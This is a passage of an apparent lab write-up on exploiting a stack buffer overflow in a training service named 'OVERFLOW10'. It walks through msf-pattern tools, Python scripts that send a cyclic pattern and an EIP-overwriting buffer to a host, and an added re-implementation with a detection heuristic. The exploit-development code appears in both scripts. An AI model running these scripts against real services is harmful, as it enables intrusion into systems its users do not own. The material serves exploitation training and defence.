Controlling the EIP
To take control of the EIP, we first need to locate the EIP's exact position within the 600-byte buffer. To do this we will make use of a tool called "msf-pattern_create", which generates a non-repeating cyclic pattern so that any 4-byte value pulled from a register can be mapped back to a single offset.
msf-pattern_create -l 600

After creating the pattern, modify the code from the previous iteration (Crasher.py) to send the newly generated pattern as the buffer instead.
#!/usr/bin/python
# Python 2: str is already a byte string, so the pattern can be sent as-is.
import socket

try:
    print ("\nSending evil buffer...")
    prefix = "OVERFLOW10 "
    # 600-byte cyclic pattern produced by: msf-pattern_create -l 600
    buffer = prefix + "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("windows.box", 1337))
    s.send(buffer)
    s.close()
    print ("\nDone!")
except socket.error:
    print ("\nCould not connect!")
python controllingEip.py


EIP = 41397241
Further inspecting the registers, as shown above, reveals that our EIP now holds a unique value instead of the 4 bytes of "\x41" (or "A") we saw in the previous iteration.
Now that we have sent in our custom pattern and extracted the value at EIP, we have to figure out where that value sits in the buffer. The tool "msf-pattern_offset" will help us with that.
msf-pattern_offset -l 600 -q 41397241

EIP was found at 537 bytes.
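To make the two tools' behaviour concrete, here is an added example (not part of the original write-up, and not Metasploit's own code) that re-creates the cyclic pattern, maps a register value back to its offset, and adds a small defensive heuristic for recognising such probe traffic in captured payloads. The function names pattern_create, pattern_offset and contains_cyclic_pattern are mine, and the 12-byte detection window is an assumption. The important detail the tools hide is byte order: the debugger shows EIP as the number 0x41397241, but the overwrite landed little-endian in memory, so the bytes that were actually written are 41 72 39 41, the ASCII string "Ar9A", which starts 537 bytes into the pattern.

```python
import string
import struct

# Longest pattern before 3-byte chunks start to repeat: 26 * 26 * 10 chunks.
MAX_UNIQUE = 26 * 26 * 10 * 3  # 20280 bytes


def pattern_create(length):
    """Re-create the msf-pattern_create sequence: Aa0 Aa1 ... Aa9 Ab0 ...
    Each 3-byte chunk (upper, lower, digit) is unique within MAX_UNIQUE bytes,
    so any 4-byte window identifies exactly one position in the buffer."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(length, eip_value):
    """Map a value read from EIP (hex string or int) back to its offset.
    The register is displayed big-endian (0x41397241) but was overwritten
    little-endian, so pack with "<I" to recover the bytes as they sat in
    memory ("Ar9A") before searching. Returns -1 if the value is not found."""
    if isinstance(eip_value, str):
        eip_value = int(eip_value, 16)
    needle = struct.pack("<I", eip_value)
    return pattern_create(length).encode("ascii").find(needle)


def contains_cyclic_pattern(payload, window=12):
    """Defensive heuristic: does the payload carry a run of the cyclic pattern?
    window=12 (four consecutive chunks) is an assumed threshold chosen so that
    short incidental substrings such as "Aa0" do not trigger it."""
    if isinstance(payload, str):
        payload = payload.encode("latin-1")
    full = pattern_create(MAX_UNIQUE).encode("ascii")
    for i in range(len(payload) - window + 1):
        if full.find(payload[i:i + window]) != -1:
            return True
    return False


if __name__ == "__main__":
    print(pattern_create(600)[:30])          # Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9
    print(pattern_offset(600, "41397241"))   # 537
    # Constructed sample payload in the shape the write-up sends.
    print(contains_cyclic_pattern("OVERFLOW10 " + pattern_create(600)))  # True
```

The generator stops at 20280 bytes of unique chunks; beyond that the sequence would repeat and a 4-byte lookup could return more than one offset, which is why longer probes are normally done in stages rather than with one enormous pattern. The detection helper is included to show that this probe is trivially recognisable on the wire: a stream of alternating upper, lower and digit bytes in the fixed order the tool emits is a strong signal in network captures or service logs.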
Now let's verify that by further modifying our initial code we are able to write 4 "B"s, or 4 bytes of \x42, into the EIP.

#!/usr/bin/python
# Python 2: str is already a byte string, so the buffer can be sent as-is.
import socket

try:
    print ("\nSending evil buffer...")
    prefix = "OVERFLOW10 "
    filler = "A" * 537   # offset reported by msf-pattern_offset
    eip = "B" * 4        # the 4 bytes that should land in EIP
    buffer = prefix + filler + eip
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("windows.box", 1337))
    s.send(buffer)
    s.close()
    print ("\nDone!")
except socket.error:
    print ("\nCould not connect!")
python controlledEip.py


After running the new exploit code, we are able to see that we have successfully overwritten the EIP with \x42\x42\x42\x42. Now we have gained control of the EIP and are ready to move on to the next step.